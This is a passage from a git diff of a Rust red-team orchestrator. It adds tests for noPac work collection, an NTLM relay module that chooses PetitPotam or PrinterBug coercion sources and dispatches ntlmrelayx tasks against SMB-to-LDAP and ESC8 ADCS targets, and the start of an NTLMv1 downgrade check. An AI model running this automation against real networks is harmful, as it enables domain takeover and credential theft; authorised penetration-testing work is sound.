let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10"); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!( + "nopac:{}:{}", + "CONTOSO.LOCAL".to_lowercase(), + "192.168.58.10" + ); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NOPAC, "nopac"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: 
"admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "nopac", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "nopac"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = NopacWork { + dedup_key: "nopac:contoso.local:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn dedup_key_case_normalization() { + let domain = "CONTOSO.LOCAL"; + let dc_ip = "192.168.58.10"; + let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip); + assert_eq!(key, "nopac:contoso.local:192.168.58.10"); + + let domain2 = "Fabrikam.Local"; + let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20"); + assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20"); + } + + // --- collect_nopac_work tests 
--- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn collect_skips_dominated_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.dominated_domains.insert("contoso.local".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_no_matching_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + 
.insert("contoso.local".into(), "192.168.58.10".into()); + // Credential for different domain, noPac requires exact domain match + state.credentials.push(make_cred("admin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn domain_matching_for_credential_selection() { + let cred_contoso = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let cred_fabrikam = ares_core::models::Credential { + id: "c2".into(), + username: "fabadmin".into(), + 
password: "FabPass!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [cred_contoso, cred_fabrikam]; + let target_domain = "fabrikam.local"; + + let matched = creds + .iter() + .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase()); + assert!(matched.is_some()); + assert_eq!(matched.unwrap().username, "fabadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs new file mode 100644 index 00000000..75e57b1b --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs @@ -0,0 +1,850 @@ +//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met. +//! +//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion +//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches +//! relay attacks when: +//! +//! 1. SMB signing is disabled on a target (relay destination) +//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target) +//! 3. We have credentials to trigger coercion or a known coercion source +//! +//! The worker agent coordinates ntlmrelayx + coercion within a single task. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dedup key prefix for relay attacks. +const DEDUP_SET: &str = DEDUP_NTLM_RELAY; + +/// Monitors for NTLM relay opportunities and dispatches relay attacks. +/// Interval: 30s. +pub async fn auto_ntlm_relay(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlm_relay") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec<RelayWork> = { + let state = dispatcher.state.read().await; + collect_relay_work(&state, &listener) + }; + + for item in work { + let payload = match &item.relay_type { + RelayType::SmbToLdap => json!({ + "technique": "ntlm_relay_ldap", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + RelayType::Esc8 { ca_name, domain } => json!({ + "technique": "ntlm_relay_adcs", + "relay_target": item.relay_target, + "listener_ip": item.listener, + "ca_name": ca_name, + "domain": domain, + "coercion_source": item.coercion_source, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }), + }; + + let priority = dispatcher.effective_priority("ntlm_relay"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + relay_target = %item.relay_target, + relay_type = %item.relay_type, + "NTLM relay attack dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SET, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay"); + } + } + } + } +} + +/// Collect relay work items from current state.
+/// +/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_relay_work( + state: &crate::orchestrator::state::StateInner, + listener: &str, +) -> Vec<RelayWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let target_ip = vuln + .details + .get("target_ip") + .or_else(|| vuln.details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if target_ip.is_empty() { + continue; + } + + let relay_key = format!("smb_relay:{target_ip}"); + if state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::SmbToLdap, + relay_target: target_ip.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + // Path 2: Relay to ADCS web enrollment (ESC8) + for vuln in state.discovered_vulnerabilities.values() { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "esc8" && vtype != "adcs_web_enrollment" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let ca_host = vuln + .details + .get("ca_host") + .or_else(|| vuln.details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if ca_host.is_empty() { + continue; + } + + let relay_key = format!("esc8_relay:{ca_host}"); + if
state.is_processed(DEDUP_SET, &relay_key) { + continue; + } + + let coercion_source = find_coercion_source(&state.domain_controllers, |ip| { + state.is_processed(DEDUP_COERCED_DCS, ip) + }); + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => continue, + }; + + let ca_name = vuln + .details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + items.push(RelayWork { + dedup_key: relay_key, + relay_type: RelayType::Esc8 { ca_name, domain }, + relay_target: ca_host.to_string(), + coercion_source, + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug). +/// +/// Takes the domain_controllers map and a closure to check dedup state, +/// keeping us decoupled from `StateInner`'s module visibility. +fn find_coercion_source( + domain_controllers: &std::collections::HashMap<String, String>, + is_processed: impl Fn(&str) -> bool, +) -> Option<String> { + // Prefer a DC we haven't already coerced + domain_controllers + .values() + .find(|ip| !is_processed(ip)) + .or_else(|| domain_controllers.values().next()) + .cloned() +} + +struct RelayWork { + dedup_key: String, + relay_type: RelayType, + relay_target: String, + coercion_source: Option<String>, + listener: String, + credential: ares_core::models::Credential, +} + +enum RelayType { + SmbToLdap, + Esc8 { ca_name: String, domain: String }, +} + +impl std::fmt::Display for RelayType { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + Self::SmbToLdap => write!(f, "smb_to_ldap"), + Self::Esc8 { ..
} => write!(f, "esc8_adcs"), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashMap; + + #[test] + fn relay_type_display() { + assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap"); + assert_eq!( + RelayType::Esc8 { + ca_name: "CA".into(), + domain: "contoso.local".into() + } + .to_string(), + "esc8_adcs" + ); + } + + #[test] + fn dedup_key_format_smb() { + let key = format!("smb_relay:{}", "192.168.58.22"); + assert_eq!(key, "smb_relay:192.168.58.22"); + } + + #[test] + fn dedup_key_format_esc8() { + let key = format!("esc8_relay:{}", "192.168.58.10"); + assert_eq!(key, "esc8_relay:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SET, "ntlm_relay"); + } + + #[test] + fn find_coercion_source_prefers_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + // First DC already processed, second not + let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10"); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.20"); + } + + #[test] + fn find_coercion_source_falls_back_to_any() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + + // All processed, still returns one + let result = find_coercion_source(&dcs, |_| true); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.10"); + } + + #[test] + fn find_coercion_source_empty_map() { + let dcs = HashMap::new(); + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_none()); + } + + #[test] + fn esc8_vuln_type_matching() { + let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "esc8" || vtype == "adcs_web_enrollment", + "{t} should match" + ); + } + } + + #[test] + fn smb_signing_vuln_type_matching() { + let vtype = 
"smb_signing_disabled".to_lowercase(); + assert_eq!(vtype, "smb_signing_disabled"); + + let not_smb = "mssql_access".to_lowercase(); + assert_ne!(not_smb, "smb_signing_disabled"); + } + + #[test] + fn relay_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RelayWork { + dedup_key: "smb_relay:192.168.58.22".into(), + relay_type: RelayType::SmbToLdap, + relay_target: "192.168.58.22".into(), + coercion_source: Some("192.168.58.10".into()), + listener: "192.168.58.100".into(), + credential: cred.clone(), + }; + assert_eq!(work.relay_target, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn smb_to_ldap_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlm_relay_ldap", + "relay_target": "192.168.58.22", + "listener_ip": "192.168.58.100", + "coercion_source": "192.168.58.10", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_ldap"); + assert_eq!(payload["relay_target"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn esc8_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + 
password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let relay_type = RelayType::Esc8 { + ca_name: "contoso-CA".into(), + domain: "contoso.local".into(), + }; + let payload = json!({ + "technique": "ntlm_relay_adcs", + "relay_target": "192.168.58.10", + "listener_ip": "192.168.58.100", + "ca_name": "contoso-CA", + "domain": "contoso.local", + "coercion_source": "192.168.58.20", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_adcs"); + assert_eq!(payload["ca_name"], "contoso-CA"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(relay_type.to_string(), "esc8_adcs"); + } + + #[test] + fn target_ip_extraction_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_ip_field() { + let details = serde_json::json!({"ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.23"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.99"); + } + + #[test] + fn ca_host_extraction_fallback() { + let details = serde_json::json!({"ca_host": "192.168.58.10"}); + let fallback = "192.168.58.99"; + let ca_host = details + 
.get("ca_host") + .or_else(|| details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host, "192.168.58.10"); + + let details2 = serde_json::json!({"target_ip": "192.168.58.20"}); + let ca_host2 = details2 + .get("ca_host") + .or_else(|| details2.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host2, "192.168.58.20"); + } + + #[test] + fn ca_name_extraction() { + let details = serde_json::json!({"ca_name": "contoso-CA"}); + let ca_name = details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name, "contoso-CA"); + + let details2 = serde_json::json!({}); + let ca_name2 = details2 + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name2, ""); + } + + #[test] + fn find_coercion_source_all_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_some()); + } + + #[test] + fn relay_type_display_exhaustive() { + let smb = RelayType::SmbToLdap; + assert_eq!(format!("{smb}"), "smb_to_ldap"); + + let esc8 = RelayType::Esc8 { + ca_name: String::new(), + domain: String::new(), + }; + assert_eq!(format!("{esc8}"), "esc8_adcs"); + } + + // --- collect_relay_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred() -> ares_core::models::Credential { + ares_core::models::Credential { + id: "c1".into(), + username: "svcadmin".into(), + password: "S3cure!Pass".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "kerberoast".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + 
"target_ip".to_string(), + serde_json::Value::String(target_ip.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "smb_signing_disabled".to_string(), + target: target_ip.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn make_esc8_vuln( + id: &str, + ca_host: &str, + ca_name: &str, + domain: &str, + ) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "ca_host".to_string(), + serde_json::Value::String(ca_host.to_string()), + ); + details.insert( + "ca_name".to_string(), + serde_json::Value::String(ca_name.to_string()), + ); + details.insert( + "domain".to_string(), + serde_json::Value::String(domain.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "esc8".to_string(), + target: ca_host.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 8, + } + } + + #[tokio::test] + async fn collect_relay_work_empty_state() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "empty state should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_no_credentials() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_smb_signing_disabled() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + 
s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22"); + assert_eq!(work[0].relay_target, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert!(matches!(work[0].relay_type, RelayType::SmbToLdap)); + assert_eq!(work[0].coercion_source, Some("192.168.58.10".into())); + assert_eq!(work[0].credential.username, "svcadmin"); + } + + #[tokio::test] + async fn collect_relay_work_esc8_vuln() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30"); + assert_eq!(work[0].relay_target, "192.168.58.30"); + match &work[0].relay_type { + RelayType::Esc8 { ca_name, domain } => { + assert_eq!(ca_name, "contoso-CA"); + assert_eq!(domain, "contoso.local"); + } + _ => panic!("expected Esc8 relay type"), + } + // No DCs configured → coercion_source is None + assert!(work[0].coercion_source.is_none()); + } + + #[tokio::test] + async fn collect_relay_work_skips_already_processed_dedup() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + // Mark the relay key as already processed + s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into()); + } + let state = shared.read().await; + let 
work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_relay_work_skips_exploited_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "exploited vulns should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_multiple_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + s.discovered_vulnerabilities.insert( + "v3".into(), + make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 3, "should produce work for all 3 vulns"); + + let smb_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap)) + .count(); + let esc8_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. 
})) + .count(); + assert_eq!(smb_count, 2); + assert_eq!(esc8_count, 1); + } + + #[tokio::test] + async fn collect_relay_work_ignores_unrelated_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + // Add an unrelated vuln type + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String("192.168.58.40".to_string()), + ); + s.discovered_vulnerabilities.insert( + "v_unrelated".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "v_unrelated".into(), + vuln_type: "mssql_impersonation".into(), + target: "192.168.58.40".into(), + discovered_by: "scanner".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 3, + }, + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "unrelated vuln types should not produce work" + ); + } + + #[tokio::test] + async fn collect_relay_work_esc8_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "already-processed esc8 should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_mixed_exploited_and_fresh() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + // Only v1 is exploited + 
s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].relay_target, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Mark first DC as already coerced + s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].coercion_source, + Some("192.168.58.20".into()), + "should prefer the uncoerced DC" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs new file mode 100644 index 00000000..a89c9a77 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs @@ -0,0 +1,382 @@ +//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication. +//! +//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can +//! downgrade auth to capture NTLMv1 hashes via Responder/MITM, which are +//! trivially crackable. This module dispatches a check per DC. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect NTLMv1 downgrade work items from state (pure logic, no async). 
+fn collect_ntlmv1_work(state: &StateInner) -> Vec<NtlmV1Work> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ntlmv1:{}", dc_ip); + if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(NtlmV1Work { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for NTLMv1 downgrade vulnerability. +/// Interval: 45s. +pub async fn auto_ntlmv1_downgrade( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
